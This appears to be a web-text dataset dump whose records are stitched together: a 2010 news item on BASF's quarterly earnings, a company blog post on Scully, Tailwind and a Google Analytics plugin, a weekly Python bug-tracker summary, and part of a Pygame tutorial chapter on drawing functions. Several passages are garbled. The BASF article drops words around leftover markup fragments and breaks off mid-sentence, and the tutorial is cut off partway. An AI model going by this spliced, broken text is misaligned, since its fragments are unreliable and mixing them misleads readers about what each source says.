text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
29 April 2010 10:38 [Source: ICIS news] (Adds detail about special items in paragraphs 4-5; chemicals performance in paragraphs 10, 12-13; outlook in paragraphs 16-18) SINGAPORE (ICIS news)--BASF’s first-quarter net profit nearly tripled to €1.03bn ($1.36bn), compared with a gain of €375m in the same quarter of 2009, partly due to higher demand in Asia and South America, the German chemicals major said on Thursday. Sales in the first quarter climbed by 27% to €15.5bn, compared with €12.2bn in the first three months of 2009, the company said. BASF’s operating income before special items was up 98% year on year to €1.95bn, mainly due to higher capacity utilisation, it said. This was offset by special items amounting to €114m, primarily due to the costs associated with the integration of Ciba, the company added. However, as the integration was now complete, BASF expected synergy gains of €350m by the end of 2010, increasing to more than €450m a year by the end of 2012. First-quarter earnings before interest and tax (EBIT) nearly doubled to €1.84bn, from €928m in the first quarter of 2009, BASF said. Limited supplies of certain chemicals as well as restocking of inventories among customers buoyed demand in almost all business divisions, the company said. Renewed demand was particularly strong from the automotive, electric and electronic industries, which boosted revenues from the company’s core segments such as chemicals and plastics, CEO Jurgen Hambrecht said. “Regionally, we saw high demand in Asia and ?xml:namespace> Alongside improved demand, higher product prices - for cracker products in the petrochemicals unit, for example - boosted sales in all chemicals divisions considerably, BASF added. Earnings were also substantially higher year on year thanks to high capacity utilisation and improved costs. BASF said the business environment for plastics had been recovering steadily since the start of 2009, while the styrenics and fertilizer units experienced increasing volume demand, resulting in improved earnings for styrenics in particular. In the performance polymers division, higher raw materials prices, partially due to limited availability, were largely be passed on to the markets, the company added. Looking ahead, Hambrecht said that despite the global economic upturn in the first quarter, he expected the economic recovery over the course of the year to slow down. “This is primarily due to the basis effect through the comparison with the previous year,” he said. Hambrecht saw risks to the recovery from "the continuing financial and debt crisis, the winding down of national stimulus programs, volatile raw materials markets, excess capacities, growing geopolitical tensions and protectionism". He cautioned that scheduled plant shutdowns for maintenance would have a negative impact on sales and earnings in the second quarter of 2010. For example, in the second quarter the firm's entire However, overall sales were expected to grow again in 2010 and outpace global chemical production, Hambrecht said. He added: “We anticipate that the income from operations before special items will improve considerably and that we will again earn a premium on our cost of capital.” ($1 = €0.76) Additional reporting by Elaine Mills
http://www.icis.com/Articles/2010/04/29/9354835/basf-nearly-triples-q1-net-profit-to-1.03bn-on-improved-demand.html
CC-MAIN-2015-11
refinedweb
523
50.97
Scully Helped us Reach a 99 Lighthouse Score for a B2C Platform Ruslan Ponuzhdayev, the software engineer of Valor Software, shared the story and greatly contributed to the solution described. You may have heard of JAMstack. It recently entered top charts of technology choice for the web because of its ease of use, performance, and flexibility. Scully, a static site generator, brings JAMstack to the next level of effectiveness because of its Angular nature. Valor Software decided to adopt Scully to make the client’s platform fast and really convenient to use. We sped up the overall page load and increased the platform lighthouse score to 99–100. Also, connecting Google eCommerce Marketing helped us see several areas for improvement on the website and in mobile apps to streamline the user journey. Learn from our experience how you can achieve a boost in website performance and visibility for your project using Scully and Google Analytics. Also, I’m going to help you overcome possible difficulties with integrations since we’ve already been there :) Who the contributors are Alexandr Pavlovskiy and Nikita Glukhi made it possible to bring all the described to life. Many thanks for being great team players and for their great contribution to the project. Also, Dima Shekhovtsov deserves special thanks for the idea, direction, and technical guidance! Project background Well, our team’s job on this project was to reconsider the B2C platform for a game company. They had an outdated landing, as well as mobile apps that users didn’t really want to use. We were on a global mission to understand the current project situation, and then — bring value. The client had no insights in terms of the website load, performance, storage allocation, etc. And you can easily guess what we found once we peeked under the hood (it was a pile of legacy code there). At this point, we understood that something new, quick, and easy to manage needs to be built instead. That’s how Scully came into play. What is Scully and how to deploy JAMstack stands for JavaScript, APIs, and Markup. In this kind of architecture, JavaScript runs entirely on the client-side and handles any dynamic programming. Reusable APIs cover all the server-side processes, and Markup is a markup (a site generator or Webpack), and it needs to be pre-built. Scully generates static sites for Angular, those with no backend code, so no API call is needed to get the data from the server. Instead, we put all the content on our pages as data and text and make it available to end-users. This Scully Tutorial tells you all you need to know for smooth deployment. Now Lighthouse score reaches 100 We use Lighthouse, an open-source tool for checking and improving the quality of web pages in this project. You can run it through any webpage for performance, accessibility, SEO, and other audits. On completion, you get a report with suggestions for improvements, and all that is left is bringing those to life :-) The Lighthouse score represents the results from performance metrics that the tool gathered based on real website performance data. We considered the score to evaluate the website's general performance: whether and how Scully changed the picture. And I can tell that once we switched to Scully, the platform’s Lighthouse score grew from 56 to 99–100. This indicator includes performance, accessibility, SEO, and application of best practices, as you can see from the screen below. Better Google indexation — how to spot the company in the top If we remember the basics of the Google search logic, then the crawling stage comes first, to discover publicly available web pages and connected links, and bring this data back to the Google server. Then indexing, when Google tries to understand what the website is about in terms of content, images, video, etc., to categorize the object and put it “on the right shelf” in a huge Google index storage. Finally, we have serving and ranking, when in response to a user’s query Google goes through its index, searching for the most appropriate and quality answer. Angular applications are rendered at runtime, so it takes Google bots longer to recognize the content since they have to execute JS code first. And Scully helps us pre-render each route’s HTML content. It generates a static version of each website page and eases the mission for bots to see the content. That’s exactly what helped us improve the platform indexing and visibility. Learn more about boosting SEO with the help of Scully from this Academind article about SEO optimization in Angular apps. Making the overall CSS footprint smaller with Tailwind To remove CSS that we don’t need when building for production, we used Tailwind CSS. This CSS framework in the first place lets you easily style your website or app. And what’s more important in our case, it helped us to get rid of unused styles and optimize builds’ size. As creators claim, when removing unused styles with Tailwind, you never end up with more than 10kb of compressed CSS. Learn more about the framework and its worth from the Optimizing for Production material by Tailwind. User growth and stronger involvement Firstly, our release of an Alpha version of the platform tuned by Scully drew users to the product. By product, I mean in-app traits for gamers like a range of different cosmetics, including skins and pets. Scully brought us more visitors and buyers among those who already played the game and knew about the platform. Another part of the audience came because of better SEO optimization. Optimized content made the platform visible and helped new users find the website. You can see the situation before and after from the screen below (please, don’t mind the red area, it shows the moment of deployment when we couldn’t track the users’ activity). As a result, from the moment we released the new platform version, sales grew twice. Integration of Google eCommerce Marketing The eCommerce part of Google Analytics is what you definitely want to apply to gather insights on user behavior and preferences. You can also understand who makes up your core audience if that’s what you lack, and then — build more efficient marketing campaigns. eCommerce gives you access to your audience’s gender, age, geographical location. The only thing you should take care of to obtain needed data is tags. You’ve got to manage them right when setting up analytics. The following links will help you tune your tags for enhanced eCommerce: - dataLayer.push with examples - A Guide to Google Analytics User ID in Google Tag Manager - Set Up Ecommerce Tracking with Google Tag Manager: Full Guidegle-tag-manager/ - Enhanced eCommerce Guide for Google Tag Manager We integrated Google eCommerce tracking and provided our clients with the data they needed for planning future website and mobile apps upgrades. One of the most important things that we started to track is the checkout process — from the moment when the product falls into the basket through filling in the form for online payment to the actual purchase. Clients could realize what may stop a user from a purchase, what stands in the way of accomplishing the checkout. Now they have a data-driven basis for targeting bigger goals in the future. Bridging Google Analytics’ tags and your Scully platform Earlier we added a complete JavaScript tracking-code snippet into the HTML to our platform (just like described in this PPCexpo material). But when we switched to Scully and went on connecting Google Analytics to the Scully website, a conflict between Google Tag Manager and HTTPS packages arose. So, we created a plugin to pre-build this connection for Scully to add the piece of code for Google Analytics without any modifications: import { registerPlugin, getMyConfig } from '@scullyio/scully';export const GoogleAnalytics = 'googleAnalytics';export const googleAnalyticsPlugin = async (html: string): Promise<string> => { const googleAnalyticsConfig = getMyConfig(googleAnalyticsPlugin); if (!googleAnalyticsConfig || !googleAnalyticsConfig['globalSiteTag']) { throw new Error('googleAnalytics plugin missing Global Site Tag'); } const siteTag: string = googleAnalyticsConfig['globalSiteTag']; // your gtmTagId const googleAnalyticsScript = ` // your GA script code here `; return html.replace(/<\/head/i, `${googleAnalyticsScript}</head`); };const validator = async () => [];registerPlugin('postProcessByHtml', GoogleAnalytics, googleAnalyticsPlugin, validator); Use this instruction for implementing Google Tag Manager on your website. That’s where you get the following piece of code from: And this article tells how to get your Google Tag Manager ID. Here’s where you should place the plugin The Scully config file is generated automatically when we connect Scully to our Angular app. It is located in the root folder with package.json. Of course, we get a default Scully config, and then we should customize it for our project. This Guide to custom Scully plugins gives good advice for customizing plugins to your needs. Summary This switch to JAMstack and Scully gave us a tremendous amount of benefits, even those both we and the client didn’t expect to get. For example, it was a surprise that we’ll have better Google indexing. From my point of view, the main gain for this project (just like for most of them) is transparency. With such a clear structure and interaction between frontend and backend, you know exactly what’s happening on your Scully website. And when you know, you can react, and actually handle complexities that arise. Sure, there’s still much work to do, but we have bright perspectives. We plan to deepen tracking of eCommerce indicators, since this will give the client more ground for new business turns. Also, we’ll be working on mobile apps to increase users’ engagement even more! Here I shared our first experience and thus impressions from the technology. Hopefully, you’ll find the story useful. Please, don’t hesitate to share your feedback, give advice, or contact Valor Software to give your business a boost! Useful links 1. Scully Tutorial 2. Optimizing for Production material by Tailwind 3. Academind article about SEO optimization in Angular apps 4. Enhanced eCommerce Guide for Google Tag Manager 5. Guide to custom Scully plugins
https://valorsoftware.medium.com/scully-helped-us-reach-a-99-lighthouse-score-for-a-b2c-platform-e1ac5599897b?source=user_profile---------8----------------------------
CC-MAIN-2022-27
refinedweb
1,688
52.7
Hi, I am trying to authorize with NTLM auth, but can’t seem to get t right. I can authorize with Postman and NTLM auth there, but my script still get 401s… Here is a simple version of the script: import http from "k6/http"; import { check, sleep } from "k6"; export default function() { let res = http.get("", {auth: "ntlm"}); console.log("Status code: " + res.status); check(res, { "status was 200": (r) => r.status == 200 }); sleep(1); }; Is it any way to debug the NTML part? How do I know that it actually tried to authorized with NTLM? Request output: GET URLENDPOINT HTTP/1.1 Host: BASEURL User-Agent: k6/0.25.0 () Accept-Encoding: gzip Here’s the response: HTTP/1.1 401 Unauthorized Transfer-Encoding: chunked Content-Type: text/html; charset=ISO-8859-1 Date: Wed, 16 Oct 2019 14:32:43 GMT Server: Apache/2.4.37 (Win64) OpenSSL/1.0.2q-fips mod_jk/1.2.46 Www-Authenticate: Negotiate Www-Authenticate: NTLM f Access Denied. 0 If removing the NTLM auth from Postman, the response is like the one from the script. If I type wrong password, I get a set-cookie in the response… It seems to me that k6 don’t try the NTLM auth.
https://community.k6.io/t/unauthorized-with-ntlm-auth/262
CC-MAIN-2019-51
refinedweb
210
76.93
11 June 2012 04:31 [Source: ICIS news] SINGAPORE (ICIS)--?xml:namespace> NATPET and A Schulman have entered into a 50:50 joint venture for the project that will be built in two phases, Alujain said in a filing to the Saudi Stock Exchange (Tadawul) on 10 June. The first phase of the project is estimated to cost Saudi riyal (SR) 266m ($71m), which will be funded via 40% equity and 60% debt, the company said. The joint-venture PP compounding unit will be located near NATPET’s 400,000 tonne/year PP plant in Yanbu. “The joint venture will enable A Schulman and NATPET to serve a broad range of customers globally, and capitalise on growing demand for durable goods such as appliances and automotives in the Middle East, Africa and NATPET has also agreed to enter into a distribution agreement with A Schulman, in which the Ohio-based firm will distribute resins for NATPET in A Shulman is a global supplier of high performance plastics, master-batches, specialty powders, and distribution services. It has a 3,100-strong workforce and 36 manufacturing facilities globally. NATPET is a subsidiary of Alujain, which is a Saudi joint stock company set up in 1991 by a group of prominent Saudi/Gulf businessmen, according to the company’s website. (
http://www.icis.com/Articles/2012/06/11/9567926/natpet-a-schulman-build-pp-compounding-unit-in-saudi-arabia.html
CC-MAIN-2014-52
refinedweb
217
50.5
ACTIVITY SUMMARY (2021-03-12 - 2021-03-19) Python tracker at To view or respond to any of the issues listed below, click on the issue. Do NOT respond to this message. Issues counts and deltas: open 7481 ( +3) closed 47813 (+75) total 55294 (+78) Open issues with patches: 2980 Issues opened (66) ================== #35943: PyImport_GetModule() can return partially-initialized module reopened by pitrou #37788: fix for bpo-36402 (threading._shutdown() race condition) cause reopened by mark.dickinson #42161: Remove private _PyLong_Zero and _PyLong_One variables reopened by rhettinger #43334: venv does not install libpython reopened by anuppari #43439: [security] Add audit events on GC functions giving access to a reopened by steve.dower #43481: PyEval_EvalCode() namespace issue not observed in Python 2.7. opened by chrisgmorton #43482: Py_AddPendingCall Inserted Function Never Called in 3.8, works opened by chrisgmorton #43484: we can create valid datetime objects that become invalid if th opened by zzzeek #43486: Python 3.9 installer not updating ARP table opened by codaamok #43487: Rename __unicode__ methods to __str__ in 2to3 conversion opened by bartbroere #43490: IDLE freezes at random opened by aledeaux #43492: Upgrade to SQLite 3.35.2 in macOS and Windows opened by erlendaasland #43493: EmailMessage mis-folding headers of a certain length opened by mglover #43494: Minor changes to Objects/lnotab_notes.txt opened by skip.montanaro #43495: Missing frame block push in compiler_async_comprehension_gener opened by tomkpz #43497: SyntaxWarning for "assertion is always true, perhaps remove pa opened by darke #43498: "dictionary changed size during iteration" error in _ExecutorM opened by kulikjak #43500: Add filtercase() into fnmatch opened by wyz23x2 #43501: email._header_value_parse throws AttributeError on display nam opened by elenril #43502: [C-API] Convert obvious unsafe macros to static inline functio opened by erlendaasland #43503: [subinterpreters] PyObject statics exposed in the limited API opened by eric.snow #43504: effbot.org down opened by mdk #43505: [sqlite3] Explicitly initialise and shut down sqlite3 opened by erlendaasland #43508: Miscompilation information for tarfile.open() when given too m opened by xxm #43509: CFunctionType object should be hashable in Python opened by xxm #43510: PEP 597: Implemente encoding="locale" option and EncodingWarni opened by methane #43511: tkinter with Tk 8.6.11 is slow on macOS opened by thomaswamm #43513: venv: recreate symlinks on --upgrade opened by ThiefMaster #43514: Disallow fork in a subinterpreter affects multiprocessing plug opened by franku #43517: Fix false positives in circular import detection with from-imp opened by pitrou #43518: textwrap.shorten does not always respect word boundaries opened by annesylvie #43520: Fraction only handles regular slashes ("/") and fails with oth opened by weightwatchers-carlanderson #43522: SSLContext.hostname_checks_common_name appears to have no effe opened by Quentin.Pradet #43523: Handling Ctrl+C while waiting on I/O in Windows opened by sovetov #43524: Addition of peek and peekexactly methods to asyncio.StreamRead opened by awalgarg #43525: pathlib: Highlight pathlib operator behavior with anchored pat opened by diegoe #43526: Programmatic management of BytesWarning doesn't work for nativ opened by xmorel #43527: Support full stack trace extraction in warnings. opened by xmorel #43528: "connect_read_pipe" raises errors on Windows for STDIN opened by ivankravets #43529: pathlib.Path.glob causes OSError encountering symlinks to long opened by eric.frederich #43530: email.parser.BytesParser failed to parse mail when it is with opened by tzing #43532: Add keyword-only fields to dataclasses opened by eric.smith #43533: Exception and contextmanager in __getattr__ causes reference c opened by crccw #43534: turtle.textinput window is not transient opened by quid256 #43535: Make str.join auto-convert inputs to strings. opened by rhettinger #43536: 3.9.2 --without-pymalloc --with-pydebug --with-valgrind: test opened by Thermi #43537: interpreter crashes when handling long text in input() opened by xxm #43538: [Windows] support args and cwd in os.startfile() opened by eryksun #43539: test_asyncio: test_sendfile_close_peer_in_the_middle_of_receiv opened by vstinner #43540: importlib: Document how to replace load_module() in What's New opened by vstinner #43542: Add image/heif(heic) to list of media types in mimetypes.py opened by martbln #43544: mimetype default list make a wrong guess for illustrator file opened by Inkhey #43545: Use LOAD_GLOBAL to set __module__ in class def opened by bup #43546: "Impossible" KeyError from importlib._bootstrap acquire line 1 opened by anentropic #43547: support ZIP files with zeroed out fields (e.g. for reproducibl opened by eighthave #43548: RecursionError depth exceptions break pdb's interactive tracin opened by behindthebrain #43549: Outdated descriptions for configuring valgrind. opened by xxm #43550: pip.exe is missing from the NuGet package opened by gipetrou #43551: [Subinterpreters]: PyImport_Import use static silly_list under opened by JunyiXie #43552: Add locale.get_locale_encoding() and locale.get_current_locale opened by vstinner #43553: [sqlite3] Improve test coverage opened by erlendaasland #43554: email: encoded headers lose their quoting when refolded opened by Emil.Styrke #43555: Location of SyntaxError with new parser missing (after continu opened by aroberge #43556: fix attr names for ast.expr and ast.stmt opened by samwyse #43557: Deprecate getdefaultlocale(), getlocale() and normalize() func opened by vstinner #43558: The dataclasses documentation should mention how to call super opened by eric.smith Most recent 15 issues with no replies (15) ========================================== #43558: The dataclasses documentation should mention how to call super #43556: fix attr names for ast.expr and ast.stmt #43555: Location of SyntaxError with new parser missing (after continu #43554: email: encoded headers lose their quoting when refolded #43553: [sqlite3] Improve test coverage #43551: [Subinterpreters]: PyImport_Import use static silly_list under #43550: pip.exe is missing from the NuGet package #43549: Outdated descriptions for configuring valgrind. #43548: RecursionError depth exceptions break pdb's interactive tracin #43545: Use LOAD_GLOBAL to set __module__ in class def #43544: mimetype default list make a wrong guess for illustrator file #43542: Add image/heif(heic) to list of media types in mimetypes.py #43538: [Windows] support args and cwd in os.startfile() #43533: Exception and contextmanager in __getattr__ causes reference c #43530: email.parser.BytesParser failed to parse mail when it is with Most recent 15 issues waiting for review (15) ============================================= #43553: [sqlite3] Improve test coverage #43552: Add locale.get_locale_encoding() and locale.get_current_locale #43551: [Subinterpreters]: PyImport_Import use static silly_list under #43542: Add image/heif(heic) to list of media types in mimetypes.py #43534: turtle.textinput window is not transient #43532: Add keyword-only fields to dataclasses #43525: pathlib: Highlight pathlib operator behavior with anchored pat #43522: SSLContext.hostname_checks_common_name appears to have no effe #43517: Fix false positives in circular import detection with from-imp #43510: PEP 597: Implemente encoding="locale" option and EncodingWarni #43503: [subinterpreters] PyObject statics exposed in the limited API #43502: [C-API] Convert obvious unsafe macros to static inline functio #43501: email._header_value_parse throws AttributeError on display nam #43498: "dictionary changed size during iteration" error in _ExecutorM #43497: SyntaxWarning for "assertion is always true, perhaps remove pa Top 10 most discussed issues (10) ================================= #43552: Add locale.get_locale_encoding() and locale.get_current_locale 25 msgs #42128: Structural Pattern Matching (PEP 634) 13 msgs #43503: [subinterpreters] PyObject statics exposed in the limited API 13 msgs #43313: feature: support pymalloc for subinterpreters. each subinterpr 9 msgs #43502: [C-API] Convert obvious unsafe macros to static inline functio 9 msgs #43475: Worst-case behaviour of hash collision with float NaN 8 msgs #43244: Move PyArena C API to the internal C API 7 msgs #43466: ssl/hashlib: Add configure option to set or auto-detect rpath 7 msgs #43478: Disallow Mock spec arguments from being Mocks 7 msgs #35883: Python startup fails with a fatal error if a command line argu 6 msgs Issues closed (74) ================== #12777: Inconsistent use of VOLUME_NAME_* with GetFinalPathNameByHandl closed by eryksun #15453: ctype with packed bitfields does not match native compiler closed by eryksun #15698: PEP 3121, 384 Refactoring applied to pyexpat module closed by vstinner #18017: ctypes.PyDLL documentation closed by eryksun #22781: ctypes: Differing results between Python and C. closed by eryksun #25012: pathlib should allow converting to absolute paths without reso closed by eryksun #25117: Windows installer: precompiling stdlib fails with missing DLL closed by steve.dower #26882: The Python process stops responding immediately after starting closed by eryksun #27820: Possible bug in smtplib when initial_response_ok=False closed by orsenthil #28344: Python 3.5.2 installer hangs when run in session 0 closed by eryksun #29586: Cannot run pip in fresh install of py 3.5.3 closed by steve.dower #29687: smtplib does not support proxy closed by christian.heimes #29982: tempfile.TemporaryDirectory fails to delete itself closed by gvanrossum #31103: Windows Installer Product does not include micro version in di closed by steve.dower #32434: pathlib.WindowsPath.reslove(strict=False) returns absoulte pat closed by eryksun #33129: Add kwarg-only option to dataclass closed by eric.smith #33136: Harden ssl module against CVE-2018-8970 closed by gregory.p.smith #33159: Implement PEP 473 closed by skreft #33603: Subprocess Thread handles grow with each call and aren't relea closed by eryksun #33780: [subprocess] Better Unicode support for shell=True on Windows closed by eryksun #34187: Issues with lazy fd support in _WindowsConsoleIO fileno() and closed by eryksun #34840: dlopen() error with no error message from dlerror() closed by eryksun #35216: misleading error message from shutil.copy() closed by eryksun #36646: os.listdir() got permission error in Python3.6 but it's fine i closed by eryksun #37820: Unnecessary URL scheme exists to allow 'URL: reading file in u closed by christian.heimes #39340: shutil.rmtree and write protected files closed by eryksun #39342: Expose X509_V_FLAG_ALLOW_PROXY_CERTS in ssl closed by christian.heimes #40540: inconstent stdin buffering/seeking behaviour closed by eryksun #40763: zipfile.extractall is safe by now closed by gregory.p.smith #41123: Remove Py_UNICODE APIs except PEP 623 closed by methane #41200: Add pickle.loads fuzz test closed by gregory.p.smith #41567: multiprocessing.Pool from concurrent threads failure on 3.9.0r closed by pitrou #41883: ctypes pointee goes out of scope, then pointer in struct dangl closed by eryksun #41933: Wording of s * n in Common Sequence Operations is not optimal closed by mdk #42322: Spectre mitigations in CPython interpreter closed by gregory.p.smith #42370: test_ttk_guionly: test_to() fails on the GitHub Ubuntu job closed by vstinner #42730: TypeError/hang inside of Time.Sleep() when _thread.interrupt_m closed by eryksun #43065: Delegating to thread and process deadlocks closed by doublex #43068: test_subprocess: test_specific_shell() fails on AMD64 FreeBSD closed by vstinner #43175: filecmp is not working for UTF-8 BOM file. closed by eryksun #43199: FAQ about goto lacks answer closed by terry.reedy #43214: site: Potential UnicodeDecodeError when handling pth file closed by methane #43228: Regression in function builtins closed by vstinner #43245: Add keyword argument support to ChainMap.new_child() closed by rhettinger #43285: ftplib should not use the host from the PASV response closed by gregory.p.smith #43353: Document that logging.getLevelName() can return a numeric valu closed by felixxm #43357: Python memory cleaning closed by gregory.p.smith #43382: github CI blocked by the Ubuntu CI with an SSL error closed by christian.heimes #43410: Parser does not handle correctly some errors when parsin from closed by pablogsal #43427: Possible error on the descriptor howto guide closed by rhettinger #43428: Sync importlib_metadata enhancements through 3.7. closed by jaraco #43437: venv activate bash script has wrong line endings on windows closed by eryksun #43441: [Subinterpreters]: global variable next_version_tag cause meth closed by vstinner #43444: [sqlite3] Move MODULE_NAME def from setup.py to module.h closed by berker.peksag #43462: canvas.bbox returns None on 'hidden' items while coords doesn' closed by Vincent #43477: from x import * behavior inconsistent between module types. closed by brett.cannon #43479: Remove a duplicate comment and assignment in http.client closed by orsenthil #43483: Loss of content in simple (but oversize) SAX parsing closed by ridgerat1611 #43485: Spam closed by zach.ware #43488: Added new methods to vector.py closed by rhettinger #43489: Can't install, nothing to install closed by ned.deily #43491: Windows filepath bug closed by eryksun #43496: macOS tkinter Save As doesn't accept keyboard shortcuts closed by terry.reedy #43499: Compiler warnings in building Python 3.9 on Windows closed by serhiy.storchaka #43506: PEP 624: Update document for removal schedule closed by methane #43507: Variables in locals scope fails to be printed. closed by mark.dickinson #43512: Bug in isinstance(instance, cls) with cls being a protocol? (P closed by gvanrossum #43515: Lazy import in concurrent.futures produces partial import erro closed by pitrou #43516: python on raspberry pi closed by eric.smith #43519: access python private variable closed by steven.daprano #43521: Allow `ast.unparse` to handle NaNs and empty sets closed by pablogsal #43531: Turtle module does not work closed by mark.dickinson #43541: PyEval_EvalCodeEx() can no longer be called with code which ha closed by vstinner #43543: Spam closed by petr.viktorin
https://mail.python.org/archives/list/python-dev@python.org/thread/5H3JH3KFIHAO3DDSXHL7DAFVTIYQ5NG3/
CC-MAIN-2021-17
refinedweb
2,127
54.02
- class extractor works differently when they are handwritten Thu, 2011-08-11, 10:39 Hi everyone, before I open a bug report, I would like to have your opinion on the following : According to the scala specification, the extractor built by case classes is the following (scala specification §5.3.2): def unapply[tps](x: c[tps]) = if (x eq null) scala.None else scala.Some(x.xs11, ..., x.xs1k) For implementation reasons, I want to be able to mimic the behavior of this extractor on a non-case class. However, my implementation fails to reproduce the same behavior. Here is an example of the difference i have: trait A sealed trait B[X <: A]{ val x: X } case class C[X <: A](x: X) extends B[X] class D[X <: A](val x: X) extends B[X] object D { def unapply[X <: A](d: D[X]): Option[X] = if (d eq None) None else Some(d.x) } def ext[X <: A](b: B[X]) = b match { case C(x) => Some(x) case D(x) => Some(x) case _ => None } I have the following warning : :37: warning: non variable type-argument X in type pattern D[X] is unchecked since it is eliminated by erasure case D(x) => Some(x) Notice the warning occurs only in the D case, not in the case-class textractor case. Do you have any idea about the cause of the warning / about what I should do to avoid this warning ? Furthermore, The AST of object C and D seems to have the same content for method unapply. Note: If you want to test it in REPL, the easiest way is: To activate unchecked warning scala> :power scala> settings.unchecked.value = true To copy above code in paste mode: scala> :paste [copy/paste] [ctrl + D] Note: this message was first submitted to stack overflow:-... Best regards -- Nicolas
http://www.scala-lang.org/old/node/10631
CC-MAIN-2015-06
refinedweb
312
65.56
#include <NodeCFIVS.H> Class to get IntVectSet of nodes (of a particular face of a particular box) that lie on interface with next coarser level. This class should be considered internal to AMRNodeSolver and should not be considered part of the Chombo API. Destructor. Full define function. The current level is taken to be the fine level. Full define function. The current level is taken to be the fine level. Returns true if this coarse-fine IntVectSet is empty. Returns true if this coarse-fine IntVectSet can be represented as just a Box, i.e., a user can perform a dense computation instead of a pointwise calculation using IVSIterator. If isPacked() then you can use packedBox() instead of getFineIVS(). If isPacked() returns true, then the box returned by this function is a suitable substitute for this IntVectSet returned by getFineIVS(). References m_packedBox. Returns indices of fine nodes, on the face of the box, that lie on the interface with the coarser level and where data need to be interpolated. This will be empty if isEmpty() returns true. If isPacked() then you can use packedBox() instead of getFineIVS(). indices of fine nodes that need to be interpolated Referenced by isPacked(). Referenced by packedBox().
http://davis.lbl.gov/Manuals/CHOMBO-RELEASE-3.2/classNodeCFIVS.html
CC-MAIN-2018-51
refinedweb
202
67.35
Tax Have a Tax Question? Ask a Tax Expert Hi, You have already received the check (made out to you personally, rather than to the LLC or C-Corp)? Yes, and deposited. Because an LLC and a sole proprietor, are pass-through entities, the amount (after deducting business expanses, as you mention) will end up on line 12 of your personal income tax return (business income or loss) Th, from a tax standpoint is probably the best, XXXXX XXXXX two reasons: (1) the C-Corp (paying it's own taxes at corporate rates) may be at a higher bracked than you, individually ... AND ... (2) After the C-corp pays it's own taxes, any dividends you pull for yourself will be taxed again at your individual level (this is the double taxation you hear about, with regard to C-Corps) It really depends on an analysis of YOUR personal marginal tax rate for the year, as compared to the c.corps rate Should I just pay the consultant through my personal account that the check was deposited in, or transfer to the LLC and pay from there? Hoevenr, if the check wasn't made out TO the c-Corp, thismay be a non-issue anyway, (unless you can have the maker, stop payment and re-issue to the C-Corp) Too late for that, plus it took 6 months to finally get payment.... Either way works, again because the net profit will be taxed at your personal level from either the LLC or the sole prop ... from a liability standpoint, it WOULD be better to run everything through the C-Corp I need transfer some of those funds to the C-Corp to cover some expenses. How should that be classified? on the C-corp books' Understand, but yes ... I would do it all through the LLC, you'll just file a schedule C with for the LLC as an attachment to your 1040 and you will have that expenses (and any other business expenses of the LLC_ deducted before carrying it to the 1040 This doesn't touch the C-Corps books at all IF it was made to you personally, the C-Corp did not do this businessa but because the tax effect (and ownership) is effectively the same for the Sole PRop and the LLC (both disregarded entities by IRS) just deposit it to the LLC account and report it there Yes, I know. I just need money in the C-Corp account to pay other expenses.....should this be a loan to the corp from the LLC or categorized as some sort of equity investment Sure, you can just contribute the money to the C-corp as a capital investment (it will increase your basis in the C-Corp, should you ever sell it) BUT you'll still need to report the INCOME (or rather the profit left after taking business expenses) on your tax return (again BEST done through the LLC) Got it...So I record it as a Capital Investment in the C-Corp books. thanks debit cash, credit owners capital ... BUT that's t the taxable event... the profit from the business is sorry for the typo (trying to say, investing in the C. Corp) is "N"T" the taxable event geez, is NOT :) but yes, you have it Back to your original question? It's being sure that you use all of the ordinary and necessary business expenses you can (including the contractor) on the schedule C for the LLC on your taxes for this year that will get that tax bill down. Hope this has helped Lane yes it has. So no taxable event from the LLC providing owners capital to the C-corp. exactly, its just taking your after tax dollars and investing in your C-Corp (the tax benefit of that will come when you sell your C-Corp and have a lower capital gain because of it) If this HAS helped, I would appreciate a feedback rating of 3 (OK) or better … That's the only way they will pay us here. HOWEVER, if you need more on this, PLEASE COME BACK here, so you won't be charged for another ...
http://www.justanswer.com/tax/81aos-architect-several-businesses-a-sole-practitioner.html
CC-MAIN-2016-44
refinedweb
703
60.18
Program Arcade GamesWith Python And Pygame Chapter 10: Controllers and Graphics How do we get objects to move using the keyboard, mouse, or a game controller? 10.1 Introduction So far, we've shown how to animate items on the screen, but not how to interact with them. How do we use a mouse, keyboard, or game controller to control the action on-screen? Thankfully this is pretty easy. To begin with, it is necessary to have an object that can be moved around the screen. The best way to do this is to have a function that takes in an x and y coordinate, then draws an object at that location. So back to Chapter 9! Let's take a look at how to write a function to draw an object. All the Pygame draw functions require a screen parameter to let Pygame know which window to draw on. We will need to pass this in to any function we create to draw an object on the screen. The function also needs to know where to draw the object on the screen. The function needs an x and y. We pass the location to the function as a parameter. Here is example code that defines a function that will draw a snowman when called: def draw_snowman(screen, x, y): # Draw a circle for the head pygame.draw.ellipse(screen, WHITE, [35 + x, y, 25, 25]) # Draw the middle snowman circle pygame.draw.ellipse(screen, WHITE, [23 + x, 20 + y, 50, 50]) # Draw the bottom snowman circle pygame.draw.ellipse(screen, WHITE, [x, 65 + y, 100, 100]) Then, in the main program loop, multiple snowmen can be drawn, as seen in Figure 10.1. # Snowman in upper left draw_snowman(screen, 10, 10) # Snowman in upper right draw_snowman(screen, 300, 10) # Snowman in lower left draw_snowman(screen, 10, 300) A full working example is available on-line at: ProgramArcadeGames.com/python_examples/f.php?file=functions_and_graphics.py Chances are, from a prior lab you already have a code that draws something cool. But how do you get that into a function? Let's take an example of code that draws a stick figure: #_2<< This code can easily be put in a function by adding a function def and indenting the code under it. We'll need to bring in all the data that the function needs to draw the stick figure. We need the screen variable to tell the function what window to draw on, and an x and y coordinate for where to draw the stick figure. But we can't define the function in the middle of our program loop! The code should be removed from the main part of the program. Function declarations should go at the start of the program. We need to move that code to the top. See Figure 10.3 to help visualize. def draw_stick_figure(screen,x,y): #_3<< Right now, this code takes in an x and y coordinate. Unfortunately it doesn't actually do anything with them. You can specify any coordinate you want, the stick figure always draws in in the same exact spot. Not very useful. The next code example literally adds in the x and y coordinate to the code we had before. def draw_stick_figure(screen, x, y): # Head pygame.draw.ellipse(screen, BLACK,[96+x,83+y,10,10],0) # Legs pygame.draw.line(screen, BLACK, [100+x,100+y], [105+x,110+y], 2) pygame.draw.line(screen, BLACK, [100+x,100+y], [95+x,110+y], 2) # Body pygame.draw.line(screen, RED, [100+x,100+y], [100+x,90+y], 2) # Arms pygame.draw.line(screen, RED, [100+x,90+y], [104+x,100+y], 2) pygame.draw.line(screen, RED, [100+x,90+y], [96+x,100+y], 2) But the problem is that the figure is already drawn a certain 